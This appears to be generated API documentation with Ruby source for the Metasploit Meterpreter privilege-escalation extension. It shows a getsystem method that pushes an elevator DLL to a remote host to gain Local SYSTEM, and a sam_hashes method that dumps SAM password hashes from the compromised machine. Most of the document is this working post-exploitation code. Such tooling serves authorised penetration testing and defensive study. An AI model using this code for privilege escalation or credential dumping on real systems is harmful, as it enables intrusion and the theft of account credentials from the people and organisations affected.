

Rex::Post::Meterpreter::Extensions::Priv::Priv

This meterpreter extension provides a privilege escalation interface that is capable of doing things like dumping password hashes and performing local exploitation.

Attributes

fs[R]

Modifying privileged file system attributes.

Public Class Methods

new(client)

Initializes the privilege escalation extension.

# File lib/rex/post/meterpreter/extensions/priv/priv.rb, line 24
# Initializes the privilege escalation extension: hands the session to the
# base class under the 'priv' extension name, registers the 'priv' alias so
# the client can reach this object, and builds the Fs sub-interface.
#
# @param client [Object] the owning meterpreter client; passed straight
#   through to super and to Fs.new (exact class not visible here)
def initialize(client)
        super(client, 'priv')

        alias_entry = { 'name' => 'priv', 'ext' => self }
        client.register_extension_aliases([alias_entry])

        # Sub-interface for privileged file system attribute changes.
        self.fs = Fs.new(client)
end

Public Instance Methods

getsystem( technique=0 )

Attempt to elevate the meterpreter to Local SYSTEM

# File lib/rex/post/meterpreter/extensions/priv/priv.rb, line 42
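# Attempt to elevate the meterpreter session to Local SYSTEM.
#
# The bundled elevator DLL (chosen by the session's platform string) is read
# from the framework's data directory and sent to the remote priv extension
# together with the requested technique and a random service name. On
# success the stdapi extension is loaded if it is not already aliased, the
# session's privileges are refreshed, and a "meterpreter.getsystem" note is
# recorded in the database when one is active.
#
# @param technique [Integer] value passed through unchanged in
#   TLV_TYPE_ELEVATE_TECHNIQUE; defaults to 0 (its interpretation lives in
#   the remote extension, not here)
# @return [Array(Boolean, Integer)] [true, technique_used] when the remote
#   side reports result 0 and echoes a technique, otherwise [false, 0]
# @raise [SystemCallError] if the elevator DLL cannot be read
def getsystem( technique=0 )
        request = Packet.create_request( 'priv_elevate_getsystem' )

        # Random 6-char lowercase service name so repeated attempts do not
        # collide on the remote side.
        elevator_name = Rex::Text.rand_text_alpha_lower( 6 )

        dll_name = client.platform == 'x64/win64' ? 'elevator.x64.dll' : 'elevator.dll'
        elevator_path = ::File.expand_path(
                ::File.join( Msf::Config.install_root, 'data', 'meterpreter', dll_name ) )

        # binread yields a binary (ASCII-8BIT) string and returns "" for an
        # empty file, whereas read(stat.size) returned nil in that case and
        # would have raised a TypeError on the += below it replaced.
        elevator_data = ::File.binread( elevator_path )

        request.add_tlv( TLV_TYPE_ELEVATE_TECHNIQUE, technique )
        request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name )
        request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data )
        # bytesize equals length for a binary string; it states the intent
        # (the length TLV describes the DLL payload in bytes).
        request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.bytesize )

        # as some service routines can be slow we bump up the timeout to 90 seconds
        response = client.send_request( request, 90 )

        technique = response.get_tlv_value( TLV_TYPE_ELEVATE_TECHNIQUE )

        return [ false, 0 ] unless response.result == 0 && !technique.nil?

        client.core.use( 'stdapi' ) unless client.ext.aliases.include?( 'stdapi' )
        client.sys.config.getprivs

        if client.framework.db && client.framework.db.active
                begin
                        client.framework.db.report_note(
                                :host => client.sock.peerhost,
                                :workspace => client.framework.db.workspace,
                                :type => 'meterpreter.getsystem',
                                :data => { :technique => technique }
                        )
                rescue StandardError
                        # Reporting is best-effort: a database error must not
                        # turn an otherwise successful elevation into a failure.
                end
        end

        [ true, technique ]
end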
sam_hashes()

Returns an array of SAM hashes from the remote machine.

# File lib/rex/post/meterpreter/extensions/priv/priv.rb, line 91
# Returns an array of SAM hashes from the remote machine.
#
# Sends a 'priv_passwd_get_sam_hashes' request and wraps each newline-
# separated entry of the TLV_TYPE_SAM_HASHES reply in a SamUser.
#
# @return [Array<SamUser>] one entry per non-trailing line of the reply
def sam_hashes
        req = Packet.create_request('priv_passwd_get_sam_hashes')

        # This can take a long long time for large domain controllers, so the
        # timeout is bumped to one hour.
        reply = client.send_request(req, 3600)

        raw_hashes = reply.get_tlv_value(TLV_TYPE_SAM_HASHES)
        raw_hashes.split("\n").map { |entry| SamUser.new(entry) }
end

